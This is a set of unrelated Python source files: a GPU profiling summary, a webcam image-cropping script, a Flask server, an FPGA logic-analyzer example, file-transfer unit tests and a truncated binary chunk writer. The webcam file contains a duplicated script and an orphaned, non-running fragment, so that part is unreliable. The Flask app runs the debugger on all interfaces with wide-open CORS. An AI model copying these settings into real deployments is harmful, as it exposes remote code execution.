        :param pfx: prefix, see scan-vi, eg scan-ph-0
        :param base: directory
        :param startswith: used to select the *cat* category of runs
        the cat is the path element after evt,
        an example of *cat* for scan-ph is cvd_0_rtx_1_100M
        :return s: odict keyed by cat with Profile instances
        Finds all persisted profiles with selected prefix that meet the startswith selection,
        collecting them into an odict which is returned.
        """
        assert not base is None
        if startswith is None:
            select_ = lambda n:True
        else:
            select_ = lambda n:n.find(startswith) == 0
        pass
        relp = findfile(base, Profile.NAME )  # list of relative paths beneath base
        #log.info("base %s relp %d : NAME %s startswith %s " % (base, len(relp), Profile.NAME, startswith ))
        s = odict()
        for rp in relp:
            path = os.path.join(base, rp)
            elem = path.split("/")
            # category is the path element immediately after "evt"
            cat = elem[elem.index("evt")+1]
            sel = select_(cat)
            #log.info("path %s cat %s sel %s " % (path, cat, sel) )
            if not sel: continue
            name = cat
            ecat = cat.split("_")
            # photon count is encoded in the final cat element, eg "100M"
            npho = Num.Int( ecat[-1] )
            dir_ = os.path.dirname(path)
            prof = Profile(dir_, name)
            prof.npho = npho
            htpath1 = os.path.join(dir_, "1", "ht.npy")
            ## with multi-event running, currently get all the same hits for tags 1,2,3,...
            ## the differences are between cats
            ht = cls.LoadHit_(htpath1)
            nhit = ht.shape[0] if not ht is None else -1  # -1 marks "no hit file"
            prof.ht = ht
            prof.nhit = nhit
            # photons-per-hit; used only by the commented print below
            ihit = prof.npho/prof.nhit
            #print("car %20s npho %9d nhit %9d ihit %5d path %s " % (cat, prof.npho, prof.nhit, ihit, path))
            s[cat] = prof
        pass
        return s

    @classmethod
    def Base(cls, pfx, base=None):
        """Return the expanded scan directory for *pfx* beneath *base* (default BASE)."""
        if base is None:
            base = cls.BASE
        pass
        base = os.path.expandvars(os.path.join(base,pfx))
        return base

    # Parses cat strings such as "cvd_0_rtx_1_100M"
    CATPTN = re.compile("^cvd_(?P<cvd>\d)_rtx_(?P<rtx>\d)_(?P<M>\d*)M$")

    @classmethod
    def ExamineCats(cls, pfx, base=None):
        """Map each cat directory name under evt/ to its parsed groupdict."""
        base = cls.Base(pfx, base)
        evtdir = os.path.join(base, "evt")
        cats = os.listdir(evtdir)
        c = {}
        for cat in cats:
            m = cls.CATPTN.match(cat)
            if not m:
                log.error("failed to match %s " % cat )
                continue
            pass
            c[cat] = m.groupdict()
        pass
        return c

    @classmethod
    def UCVD(cls, c ):
        """Return the unique cvd (CUDA visible device) values appearing in *c*."""
        ucvd = list(set(map(lambda d:d["cvd"], c.values())))
        return ucvd

    @classmethod
    def Load(cls, pfx, base=None, startswith=None, gpufallback=None):
        """Load all matching profiles for *pfx* and summarize into a ProfileSmry."""
        base = cls.Base(pfx, base)
        s = cls.Load_(pfx, base, startswith)
        ps = cls.FromDict(s, pfx, startswith)
        ps.base = base
        ps.gpufallback = gpufallback
        return ps

    @classmethod
    def FromDict(cls, s, pfx, startswith):
        """
        :param s: raw odict keyed with cat with Profile instance values
        Creates ProfileSmry instance comprising arrays populated
        from the Profile instances
        """
        launch = np.zeros( [len(s), 10], dtype=np.float32 )
        alaunch = np.zeros( [len(s) ], dtype=np.float32 )
        interval = np.zeros( [len(s), 9], dtype=np.float32 )
        ainterval = np.zeros( [len(s)], dtype=np.float32 )
        npho = np.zeros( len(s), dtype=np.int32 )
        nhit = np.zeros( len(s), dtype=np.int32 )
        # NOTE(review): np.object is removed in numpy >= 1.24; use dtype=object there
        meta = np.zeros( len(s), dtype=np.object )
        # profiles ordered by ascending photon count
        for i, kv in enumerate(sorted(s.items(), key=lambda kv:kv[1].npho )):
            prof = kv[1]
            npho[i] = prof.npho
            nhit[i] = prof.nhit
            launch[i] = prof.launch
            meta[i] = prof.meta
            # averages exclude entry 0 — presumably a warm-up launch; confirm
            alaunch[i] = np.average( launch[i][1:] )
            interval[i] = prof.start_interval
            ainterval[i] = np.average( interval[i][1:] )
        pass
        ps = cls(s)
        ps.launch = launch
        ps.alaunch = alaunch
        ps.interval = interval
        ps.ainterval = ainterval
        ps.npho = npho
        ps.nhit = nhit
        ps.creator = "FromDict:%s:%s" % (pfx,startswith )
        ps.meta = meta
        ps.postinit()
        return ps

    @classmethod
    def FromExtrapolation(cls, npho, seconds_1M=0. ):
        """
        See notes/issues/geant4-beamOn-profiling.rst
        100 s : for tboolean-box scan-ph
        239 s : for full JUNO scan-pf before alignment shakedown
        """
        assert seconds_1M > 0, seconds_1M
        s = odict()
        ps = cls(s)
        ps.npho = npho
        # linear extrapolation from the per-million-photon time
        xtim = (npho/1e6)*seconds_1M
        ps.alaunch = xtim
        ps.ainterval = xtim
        ps.creator = "FromExtrapolation"
        return ps

    @classmethod
    def FromAB(cls, a, b, att="ainterval"):
        """Ratio summary b/a of attribute *att* for summaries with matching npho."""
        s = odict()
        ps = cls(s)
        assert np.all( a.npho == b.npho )
        ps.npho = a.npho
        ps.ratio = getattr(b,att)/getattr(a, att)
        ps.creator = "FromAB"
        return ps

    @classmethod
    def FromAtt(cls, a, num_att="ainterval", den_att="alaunch" ):
        """Ratio summary of two attributes of a single summary *a*."""
        s = odict()
        ps = cls(s)
        ps.npho = a.npho
        ps.ratio = getattr(a,num_att)/getattr(a, den_att)
        ps.creator = "FromAtt"
        return ps

    def __init__(self, s):
        # s: odict of Profile instances keyed by cat; the summary arrays are
        # attached afterwards by the classmethod constructors.
        self.s = s
        self.d = odict()  # common metadata key -> value, filled by postinit
        self.gpufallback = "?"

    # metadata keys expected to be common across all profiles in the summary
    COMMON = r"""
    CDeviceBriefAll
    CDeviceBriefVis
    RTXMode
    NVIDIA_DRIVER_VERSION
    """

    def commonk(self):
        """Iterate the non-empty COMMON metadata key names."""
        return filter(None,textwrap.dedent(self.COMMON).split("\n"))

    def postinit(self):
        """Collect the COMMON metadata values shared by all profiles into self.d."""
        for k in self.commonk():
            self.d[k] = self.metacommon(k)
        pass

    def descmeta(self):
        """One line per common metadata key/value."""
        return "\n".join(["%25s : %s " % (k, v) for k,v in self.d.items()])

    def _get_gpu(self):
        # GPU name from metadata, falling back to the configured gpufallback
        return self.d.get('CDeviceBriefVis',self.gpufallback)
    gpu = property(_get_gpu)

    def _get_rtx(self):
        # Human-readable RTX mode label derived from the RTXMode metadata
        RTXMode = self.d.get('RTXMode', None)
        assert RTXMode in [None,0,1,2]
        e = { None:"?", 0:"OFF", 1:"ON", 2:"ON.Tri" }
        return "RTX %s" % e[RTXMode]
    rtx = property(_get_rtx)

    def _get_autolabel(self):
        return "%s, %s" % (self.gpu, self.rtx)
    autolabel = property(_get_autolabel)

    def metacommon(self, k):
        """Value of metadata key *k*, asserting it agrees across all profiles."""
        vv = list(set(map( lambda m:m.get(k, None), self.meta )))
        assert len(vv) in [0,1], vv
        return vv[0] if len(vv) == 1 else None

    def desc(self):
        return "ProfileSmry %s %s %s " % (self.creator, getattr(self, 'base',""), self.d.get('CDeviceBriefVis','-') )

    def __repr__(self):
        # NOTE(review): list + map(...) concatenation requires Python 2; under
        # Python 3 map returns an iterator and this raises TypeError.
        return "\n".join([self.desc(), self.autolabel, self.descmeta(), Profile.Labels()]+map(lambda kv:repr(kv[1]), sorted(self.s.items(), key=lambda kv:kv[1].npho ) ))
class ProfileMain(object):
    """Argument parsing and lookup helpers for the profile-summary main."""

    @classmethod
    def ParseArgs(cls, doc):
        """Build the argument parser, parse argv and return a ProfileMain."""
        parser = argparse.ArgumentParser(__doc__)
        default_cvd = os.environ.get("OPTICKS_DEFAULT_INTEROP_CVD", "0")  ## hmm this is broken by scan-rsync when looking as scans from another machine
        parser.add_argument( "--pfx", default="scan-pf", help="Start of prefix to be appended with a hyphen and integer, beneath which to search for OpticksProfile.npy" )
        # BUG FIX: type=float added so a user-supplied value matches the float
        # default instead of arriving as a string.
        parser.add_argument( "--g4_seconds_1M", default=239.0, type=float, help="Number of seconds for G4 obtained by 1M run of OKG4Test" )
        parser.add_argument( "vers", nargs="*", default=[10], type=int, help="Prefix beneath which to search for OpticksProfile.npy" )
        parser.add_argument( "--cvd", default=default_cvd, help="CUDA_VISIBLE_DEVICE for the named GPU" )
        parser.add_argument( "--gpufallback", default="Quadro_RTX_8000", help="Fallback GPU Name for older scans without this metadata, eg TITAN_RTX" )
        args = parser.parse_args()
        return cls(args)

    def get_pfx(self, v):
        """Full prefix for version *v*, eg 'scan-pf-0'."""
        return "%s-%s" % ( self.args.pfx, v)

    def get_cvd(self, pfx):
        """
        When only one cvd in the cats return it,
        otherwise return the argument
        """
        c = ProfileSmry.ExamineCats(pfx)
        ucvd = ProfileSmry.UCVD(c)
        if len(ucvd) == 1:
            cvd = ucvd[0]
        else:
            # BUG FIX: previously referenced the module-level global `pm` from
            # __main__, which breaks any other caller; use the instance state.
            log.info("mixed cvd using argument %s " % self.cvd )
            cvd = self.cvd
        pass
        return cvd

    def _get_bashcmd(self):
        # eg pfx "scan-pf" -> "scan-;scan-pf-notes"
        pfx = self.args.pfx # without version tail -0 -1
        elem = pfx.split("-")
        assert len(elem) == 2
        return "%s-;%s-notes" % (elem[0], pfx)
    bashcmd = property(_get_bashcmd)

    def __init__(self, args):
        self.args = args
        self.vers = args.vers
        self.pfx0 = self.get_pfx(self.vers[0])
        self.cvd = args.cvd
        self.gpufallback = args.gpufallback
        self.g4_seconds_1M = args.g4_seconds_1M
        bashcmd = self.bashcmd
        log.info("lookup BashNotes from %s " % bashcmd )
        self.bnote = BashNotes(bashcmd)
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    np.set_printoptions(precision=4, linewidth=200)
    pm = ProfileMain.ParseArgs(__doc__)
    ps = {}
    for v in pm.vers:
        pfx = pm.get_pfx(v)
        cvd = pm.get_cvd(pfx)
        print(" v %d pfx %s " % (v, pfx))
        print(" %s " % (pm.bnote(v)))
        # NOTE(review): ps[0]/ps[1] are overwritten on every pass, so after the
        # loop only the last version's summaries survive — confirm intended.
        ps[0] = ProfileSmry.Load(pfx, startswith="cvd_%s_rtx_0" % cvd)
        ps[1] = ProfileSmry.Load(pfx, startswith="cvd_%s_rtx_1" % cvd)
        #ps[9] = ProfileSmry.FromExtrapolation( ps[0].npho, time_for_1M=239. )
        print("\n")
        print(ps[0])
        print("\n")
        print(ps[1])
        #print(ps[9])
    pass
|
'''The video_to_image_and_split_into_four_parts program captures an image from the webcam and cuts it into four equal parts.
The VideoCapture object is named video.
The webcam port can be changed as needed by setting "web_cam_port"; use 0 or -1 for the default webcam (external webcams are usually 1).
When the object "video" receives input, the value of "video.isOpened()" becomes TRUE.
Here "frame" is the video matrix in the while loop.
When the webcam feed is open, the user can choose to quit by pressing 'q' or the 'ESC' key.
This will delete the video matrix and the program will be terminated.
If the user wants to capture an image, press the 'SPACE' or 's' key.
This action captures the image, which is saved as 'Capture.png'.
Then the cropping function takes over, saving and displaying 4 individual images.
The images are created by reading 'Capture.png' into a matrix named 'image'.
The 'height' and 'width' of the capture are read, and a new matrix named 'crop' is created each time with different dimensions.
The cropped images will be displayed. Then press 'q' or 'ESC' to close the windows.'''
import cv2
def crop_image_into_four(image_file):
    """Split *image_file* into four equal quadrants, saving and showing each.

    Writes/displays Image_1..4.jpg in the order top-left, bottom-left,
    top-right, bottom-right. Pressing 'q' or ESC in an image window releases
    the module-level ``video`` capture and closes all windows.
    """
    image = cv2.imread(image_file)  # image matrix; use print(image) to inspect
    height, width = image.shape[:2]
    half_h = height // 2
    half_w = width // 2
    quadrants = (
        ('Image_1.jpg', image[0:half_h, 0:half_w]),           # top-left
        ('Image_2.jpg', image[half_h:height, 0:half_w]),      # bottom-left
        ('Image_3.jpg', image[0:half_h, half_w:width]),       # top-right
        ('Image_4.jpg', image[half_h:height, half_w:width]),  # bottom-right
    )
    for filename, crop in quadrants:
        cv2.imwrite(filename, crop)
        cv2.imshow(filename, crop)
    # press 'q' or 'esc' key to close the open images.
    key = cv2.waitKey(0) & 0xFF
    # BUG FIX: the original compared the undefined name 'k' (NameError);
    # the local variable is 'key'.
    if key % 256 == 27 or key == ord('q'):
        video.release()
        cv2.destroyAllWindows()
# BUG FIX: this region was garbled ("while #only using OpenCV.") — the loop
# header and body were truncated. Reconstructed from the intact duplicate of
# the same script further down in this file.
web_cam_port = 0  # use 0 or -1 for the default webcam; external cams usually 1
video = cv2.VideoCapture(web_cam_port)
while video.isOpened():
    ret, frame = video.read()  # ret is False when no frame could be read
    if ret == True:
        cv2.imshow('Video Palyer', frame)
        k = cv2.waitKey(1) & 0xFF  # mask to 8 bits for 64-bit platforms
        if k == ord('q') or k % 256 == 27:  # 'q' or ESC cancels
            break
        elif k % 256 == 32 or k == ord('s'):  # SPACE or 's' captures
            cv2.imwrite("Capture.png", frame)
            crop_image_into_four("Capture.png")
    else:
        break  # camera stopped delivering frames
video.release()
cv2.destroyAllWindows()
import cv2
def crop_image_into_four(image_file):  # Function to crop captured image into four equal parts
    """Cut the captured image into four quadrants and save/show each one.

    The image at *image_file* is loaded, split at its vertical and
    horizontal midpoints, and each quadrant is written to disk as
    Image_1.jpg .. Image_4.jpg and displayed in its own window.  The
    windows stay open until a key is pressed; ESC or 'q' also releases
    the module-level webcam handle.
    """
    image = cv2.imread(image_file)  # image matrix; use 'print(image)' to inspect it
    height, width = image.shape[:2]  # number of rows and columns in the image
    half_h = height // 2
    half_w = width // 2
    # Each crop is produced by slicing the required part of the matrix and
    # writing it back out as an image.  Bounds are
    # (name, row_start, row_end, col_start, col_end); explicit end
    # coordinates keep the original clipping behaviour for odd dimensions.
    regions = [
        ('Image_1.jpg', 0, half_h, 0, half_w),           # top-left
        ('Image_2.jpg', half_h, height, 0, half_w),      # bottom-left
        ('Image_3.jpg', 0, half_h, half_w, width),       # top-right
        ('Image_4.jpg', half_h, height, half_w, width),  # bottom-right
    ]
    for name, row0, row1, col0, col1 in regions:
        crop = image[row0:row1, col0:col1]
        cv2.imwrite(name, crop)
        cv2.imshow(name, crop)
    # press 'q' or 'ESC' to close the open images.
    key = cv2.waitKey(0) & 0xFF
    # BUG FIX: originally compared the undefined name 'k', which raised
    # NameError for any key other than ESC.
    if key % 256 == 27 or key == ord('q'):
        video.release()  # module-level VideoCapture defined below
        cv2.destroyAllWindows()
web_cam_port = 0  # use 0 or -1 for the default webcam; external webcams are usually 1
video = cv2.VideoCapture(web_cam_port)  # video object is created
# Main capture loop: show the webcam feed until the user quits (q/ESC) or
# captures a frame (SPACE/s), which is saved and split into quarters.
while video.isOpened():
    ret, frame = video.read()  # ret (bool) is False once the stream ends or is released
    if ret:  # idiom: truthiness test instead of '== True'
        # BUG FIX: window title was misspelled 'Video Palyer'.
        cv2.imshow('Video Player', frame)
        # "& 0xFF" masks the key code to 8 bits (needed on some 64-bit platforms).
        k = cv2.waitKey(1) & 0xFF
        if k == ord('q') or k % 256 == 27:  # 'q' or ESC quits
            break
        elif k % 256 == 32 or k == ord('s'):  # SPACE or 's' captures and crops
            cv2.imwrite("Capture.png", frame)  # image is captured and saved
            crop_image_into_four("Capture.png")  # cut the image into 4 parts
            video.release()
            cv2.destroyAllWindows()
    else:
        break
video.release()
cv2.destroyAllWindows()
# NOTE(review): orphaned fragment -- this lone ':' plus the indented body
# below belong to the condition-less 'while' statement that appears before
# the duplicated copy of the script above.  The file was corrupted by
# splicing two copies of the same program together; this fragment should be
# deleted (or re-merged with its 'while' header) when the duplication is
# cleaned up.
:
ret,frame = video.read()
if ret==True:
cv2.imshow('Video Palyer',frame)
k = cv2.waitKey(1) & 0xFF
if k == ord('q') or k%256 == 27:
# "& 0xFF" is given for 64 bit operating systems. Haven't figured out why......yet.
break
elif k % 256 == 32 or k == ord('s'):
cv2.imwrite("Capture.png", frame)
image_file='Capture.png'
crop_image_into_four(image_file)
video.release()
cv2.destroyAllWindows()
else:
break
video.release()
cv2.destroyAllWindows()
|
#Copyright (c) 2017 Joseph D. Steinmeyer (jodalyst)
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#questions? email me at jodalyst@mit.edu
import time
import math
from flask import Flask, render_template, session, request
from flask_cors import CORS, cross_origin
#Start up Flask server:
# Templates are served from this directory; static assets from ../../src.
app = Flask(__name__, template_folder = './',static_folder='../../src')
#app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
#socketio = SocketIO(app, async_mode = async_mode)
# Allow cross-origin requests on every route.  NOTE(review): '*' origins
# with these headers is wide open -- fine for local development, but it
# should be narrowed before any production deployment.
CORS(app,resources={
    r'/*/*': {
        'origins': '*',
        'allow_headers': ['Content-Type', 'Authorization']
    }
})
@app.route('/')
def index():
    """Root route: log the visit and serve the base template."""
    print("A user connected")
    return render_template('base.html')
if __name__ == '__main__':
    # Listen on all interfaces; debug=True enables the auto-reloader and the
    # interactive debugger (do not use in production).
    app.run(host="0.0.0.0", debug=True)
|
#!/usr/bin/env python3
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
import sys
from amaranth import Signal, Module, Elaboratable, ClockDomain, ClockSignal, Cat, Array
from luna import top_level_cli
from luna.gateware.usb.devices.ila import USBIntegratedLogicAnalyzer
from luna.gateware.usb.devices.ila import USBIntegratedLogicAnalyzerFrontend
class ILAExample(Elaboratable):
    """ Gateware module that demonstrates use of the internal ILA. """

    def __init__(self):
        # Signals to be captured by the ILA on every sample.
        self.counter = Signal(16)
        self.hello = Signal(8)

        # USB-attached integrated logic analyzer sampling the two signals
        # above; 32 samples are stored per capture.
        self.ila = USBIntegratedLogicAnalyzer(
            signals=[
                self.counter,
                self.hello
            ],
            sample_depth=32,
        )

    def interactive_display(self):
        """Attach the host-side frontend and display captured samples."""
        frontend = USBIntegratedLogicAnalyzerFrontend(ila=self.ila)
        frontend.interactive_display()

    def elaborate(self, platform):
        """Build the design: free-running counter + repeating text pattern."""
        m = Module()
        m.submodules += self.ila

        # Generate our domain clocks/resets.
        m.submodules.car = platform.clock_domain_generator()

        # Clock divider / counter.
        m.d.sync += self.counter.eq(self.counter + 1)

        # Say "hello world" constantly over our ILA...
        letters = Array(ord(i) for i in "Hello, world! \r\n")

        # Index into 'letters'; wide enough to address every letter.
        current_letter = Signal(range(0, len(letters)))

        m.d.sync += current_letter.eq(current_letter + 1)
        m.d.comb += self.hello.eq(letters[current_letter])

        # Set our ILA to trigger each time the counter is at a random value.
        # This shows off our example a bit better than counting at zero.
        # The trigger should be in the sampling domain (`sync` in this case).
        m.d.comb += self.ila.trigger.eq(self.counter == 227)

        # Return our elaborated module.
        return m
if __name__ == "__main__":
    # Build/upload the design via LUNA's CLI, then attach the host-side
    # ILA frontend to stream captured samples.
    example = top_level_cli(ILAExample)
    example.interactive_display()
|
import os
import sys
import unittest
import tempfile
"""
Shifter, Copyright (c) 2016, The Regents of the University of California,
through Lawrence Berkeley National Laboratory (subject to receipt of any
required approvals from the U.S. Dept. of Energy). All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the University of California, Lawrence Berkeley
National Laboratory, U.S. Dept. of Energy nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.`
See LICENSE for full text.
"""
from shifter_imagegw import transfer
class TransferTestCase(unittest.TestCase):
    """Tests for shifter_imagegw.transfer command builders and file transfer.

    NOTE(review): the original used Python-2-only constructs
    (``os.path.walk``, the ``0555`` octal literal, ``assertEquals``);
    they are replaced with their Python-3 equivalents without changing
    what the tests verify.
    """

    # Shared config dict; per-test values are (re)filled by setUp.
    system = {}

    def setUp(self):
        # Minimal system configuration; imageDir values are filled in by
        # the individual tests with a temporary directory.
        self.system['host'] = ['localhost']
        self.system['ssh'] = {
            'username': 'nobody',
            'key': 'somefile',
            'imageDir': None
        }
        self.system['local'] = {
            'imageDir': None
        }
        self.system['accesstype'] = 'local'

    def tearDown(self):
        """
        tear down should stop the worker
        """
        pass

    def _count_inodes(self, path):
        """Count directory entries (files + subdirectories) under *path*.

        Python-3 replacement for the old os.path.walk()-based counting:
        summing dirnames+filenames per directory yields the same total the
        Python-2 callback accumulated.
        """
        total = 0
        for _dirpath, dirnames, filenames in os.walk(path):
            total += len(dirnames) + len(filenames)
        return total

    def inodeCounter(self, ignore, dirname, fnames):
        """Legacy os.path.walk() callback, kept for backward compatibility."""
        self.inodes += len(fnames)

    def test_shCmd(self):
        """_shCmd returns the argument vector unchanged, or None without args."""
        cmd = transfer._shCmd(self.system, 'echo', 'test')
        assert len(cmd) == 2
        assert cmd[0] == 'echo'
        assert cmd[1] == 'test'
        cmd = transfer._shCmd(self.system, 'anotherCommand')
        assert len(cmd) == 1
        assert cmd[0] == 'anotherCommand'
        cmd = transfer._shCmd(self.system)
        assert cmd is None

    def test_sshCmd(self):
        """_sshCmd builds 'ssh -i <key> [opts] user@host cmd...'."""
        cmd = transfer._sshCmd(self.system, 'echo', 'test')
        ## expect ssh -i somefile nobody@localhost echo test
        assert len(cmd) == 6
        assert '|'.join(cmd) == 'ssh|-i|somefile|nobody@localhost|echo|test'
        self.system['ssh']['sshCmdOptions'] = ['-t']
        cmd = transfer._sshCmd(self.system, 'echo', 'test')
        assert len(cmd) == 7
        assert '|'.join(cmd) == 'ssh|-i|somefile|-t|nobody@localhost|echo|test'
        del self.system['ssh']['sshCmdOptions']
        cmd = transfer._sshCmd(self.system)
        assert cmd is None

    def test_cpCmd(self):
        """_cpCmd builds a plain local 'cp src dst'."""
        cmd = transfer._cpCmd(self.system, 'a', 'b')
        assert len(cmd) == 3
        assert '|'.join(cmd) == 'cp|a|b'

    def test_scpCmd(self):
        """_scpCmd builds 'scp -i <key> [opts] src user@host:dst'."""
        cmd = transfer._scpCmd(self.system, 'a', 'b')
        assert len(cmd) == 5
        assert '|'.join(cmd) == 'scp|-i|somefile|a|nobody@localhost:b'
        self.system['ssh']['scpCmdOptions'] = ['-t']
        cmd = transfer._scpCmd(self.system, 'a', 'b')
        assert len(cmd) == 6
        assert '|'.join(cmd) == 'scp|-i|somefile|-t|a|nobody@localhost:b'
        del self.system['ssh']['scpCmdOptions']

    def test_copyfile_local(self):
        """copy_file places exactly one file in the local image dir."""
        tmpPath = tempfile.mkdtemp()
        self.system['local']['imageDir'] = tmpPath
        self.system['ssh']['imageDir'] = tmpPath
        self.system['accesstype'] = 'local'
        transfer.copy_file(__file__, self.system)
        _dname, fname = os.path.split(__file__)
        filePath = os.path.join(tmpPath, fname)
        assert os.path.exists(filePath)
        assert self._count_inodes(tmpPath) == 1
        os.unlink(filePath)
        assert self._count_inodes(tmpPath) == 0
        os.rmdir(tmpPath)

    def test_copyfile_remote(self):
        """uses mock ssh/scp wrapper to pretend to do the remote
        transfer, ensure it is in PATH prior to running test
        """
        tmpPath = tempfile.mkdtemp()
        self.system['local']['imageDir'] = tmpPath
        self.system['ssh']['imageDir'] = tmpPath
        self.system['accesstype'] = 'remote'
        transfer.copy_file(__file__, self.system)
        _dname, fname = os.path.split(__file__)
        filePath = os.path.join(tmpPath, fname)
        assert os.path.exists(filePath)
        assert self._count_inodes(tmpPath) == 1
        os.unlink(filePath)
        assert self._count_inodes(tmpPath) == 0
        os.rmdir(tmpPath)

    def test_copyfile_invalid(self):
        """An unknown accesstype must raise NotImplementedError."""
        tmpPath = tempfile.mkdtemp()
        self.system['local']['imageDir'] = tmpPath
        self.system['ssh']['imageDir'] = tmpPath
        self.system['accesstype'] = 'invalid'
        with self.assertRaises(NotImplementedError):
            transfer.copy_file(__file__, self.system)
        os.rmdir(tmpPath)

    def test_copyfile_failtowrite(self):
        """Copying into an unwritable directory must raise OSError."""
        tmpPath = tempfile.mkdtemp()
        self.system['local']['imageDir'] = tmpPath
        self.system['ssh']['imageDir'] = tmpPath
        self.system['accesstype'] = 'local'
        # make directory unwritable; 0o555 is the Python-3 spelling of
        # the old 0555 literal (r-xr-xr-x)
        os.chmod(tmpPath, 0o555)
        with self.assertRaises(OSError):
            transfer.copy_file(__file__, self.system)
        assert self._count_inodes(tmpPath) == 0
        os.rmdir(tmpPath)

    def test_transfer_local(self):
        """transfer() copies the image, and optionally its metadata file."""
        tmpPath = tempfile.mkdtemp()
        self.system['local']['imageDir'] = tmpPath
        self.system['ssh']['imageDir'] = tmpPath
        self.system['accesstype'] = 'local'
        transfer.transfer(self.system, __file__)
        ## make sure transferred file exists
        dname, fname = os.path.split(__file__)
        filePath = os.path.join(tmpPath, fname)
        assert os.path.exists(filePath)
        assert self._count_inodes(tmpPath) == 1
        os.unlink(filePath)
        meta = os.path.join(dname, '__init__.py')
        transfer.transfer(self.system, __file__, meta)
        assert self._count_inodes(tmpPath) == 2
        filePath = os.path.join(tmpPath, fname)
        metaPath = os.path.join(tmpPath, '__init__.py')
        os.unlink(filePath)
        os.unlink(metaPath)
        os.rmdir(tmpPath)

    def test_remove_local(self):
        """remove_file deletes the named file from the image dir."""
        (fd, tmpPath) = tempfile.mkstemp()
        os.close(fd)  # BUG FIX: the descriptor from mkstemp was leaked
        dname, fname = os.path.split(tmpPath)
        self.system['local']['imageDir'] = dname
        self.system['ssh']['imageDir'] = dname
        self.system['accesstype'] = 'local'
        st = transfer.remove_file(fname, self.system)
        # assertEqual: assertEquals is a deprecated alias
        self.assertEqual(os.path.exists(tmpPath), False)

    # TODO: Add a test_remove_remote
# TODO: Add a test_remove_remote
if __name__ == '__main__':
    # Discover and run the test case above.
    unittest.main()
|
#!/usr/bin/env python3
"""
desc: Chunk class, defines how to create and write data to a chunk
Chunks are binary files. The last 20 bytes of a chunk is the header that can be used to seek to specific
documents in the chunk.
"""
import os
import logging
class Chunk:
    """A binary chunk file holding crawled documents.

    The last 20 bytes of a chunk form a header -- 4 bytes per document
    (1-byte document index + 3-byte start offset) -- that can be used to
    seek to specific documents inside the chunk.  Each document payload is
    preceded by its own 14-byte document header.
    """

    def __init__(self, chunk_id):
        self.chunk_id = chunk_id
        self.header = []      # list of [doc_index_byte, start_offset_bytes] pairs
        self.path = '/data/{0}'.format(chunk_id)  # './{}'.format(chunk_id)
        self.documents = []   # buffered {'doc_header': [...], 'doc_data': bytes} records
        self.log = logging.getLogger()

    def _payload_size(self):
        """Total bytes of all buffered documents including their 14-byte headers."""
        return sum(14 + len(d['doc_data']) for d in self.documents)

    def create_chunk(self):
        """
        Given a chunk_id, create (truncate) a new chunk file.
        :return: none
        """
        # 'with' guarantees the handle is closed even if something fails.
        with open(self.path, 'wb'):
            pass

    def append_to_chunk(self):
        """
        Append documents to chunk; data appended includes document_header and crawler data.
        :raises Exception: if the chunk file has not been created yet
        :return: none
        """
        if not os.path.exists(self.path):
            raise Exception('Chunk does not exist')
        with open(self.path, 'ab') as f:
            for document in self.documents:
                for value in document['doc_header']:
                    f.write(value)
                f.write(document['doc_data'])

    def create_document(self, link, title, html):
        """
        Create a document and buffer it to be written once all docs are created.
        :param link: string
        :param title: string
        :param html: string
        :return: list of buffered documents
        """
        bin_data = (link + title + html).encode('utf-8')
        # The header must be computed BEFORE the document is buffered:
        # offsets are based on the documents already in the chunk.
        doc_header = self.__compute_doc_header(link, title, html)
        self.documents.append({'doc_header': doc_header, 'doc_data': bin_data})
        # TODO: enforce the 5-document limit / overflow into a new chunk.
        return self.documents

    def append_header_to_chunk(self):
        """
        Called when all documents have been written to chunk; appends the
        fixed-length (20 byte) chunk header, 4 bytes per document.
        :raises Exception: if no header entries have been recorded
        :return: none
        """
        if not self.header:
            raise Exception('Cannot append empty header to chunk.')
        with open(self.path, 'ab') as f:
            for doc_int, start_offset in self.header:
                f.write(doc_int)       # append document_int_value
                f.write(start_offset)  # append document start offset

    def compute_file_header_value(self, doc_int_value):
        """
        Record the chunk-header entry for a document: its index byte plus
        the document's start offset (length of all content buffered so far).
        :param doc_int_value: 0-4 int value
        :return: the accumulated header list
        """
        doc_start_offset = self._payload_size().to_bytes(3, byteorder='big')
        bin_doc_int = doc_int_value.to_bytes(1, byteorder='big')
        self.header.append([bin_doc_int, doc_start_offset])
        return self.header

    def __compute_doc_header(self, link, title, html):
        """
        Calculate the 14-byte document header:
        doc_length(2), doc_start(2), link_start(2), link_length(1),
        title_start(2), title_length(1), html_start(2), html_length(2).
        :param link: string
        :param title: string
        :param html: string
        :raises OverflowError: if any field exceeds its fixed-width slot
        :return: list of byte objects
        """
        file_size = self._payload_size()
        doc_header_length = 14
        doc_length = len(link) + len(title) + len(html)
        doc_start = doc_header_length + file_size
        link_start = doc_header_length
        title_start = doc_header_length + len(link)
        html_start = title_start + len(title)
        try:
            return [
                doc_length.to_bytes(2, byteorder='big'),
                doc_start.to_bytes(2, byteorder='big'),
                link_start.to_bytes(2, byteorder='big'),
                len(link).to_bytes(1, byteorder='big'),
                title_start.to_bytes(2, byteorder='big'),
                len(title).to_bytes(1, byteorder='big'),
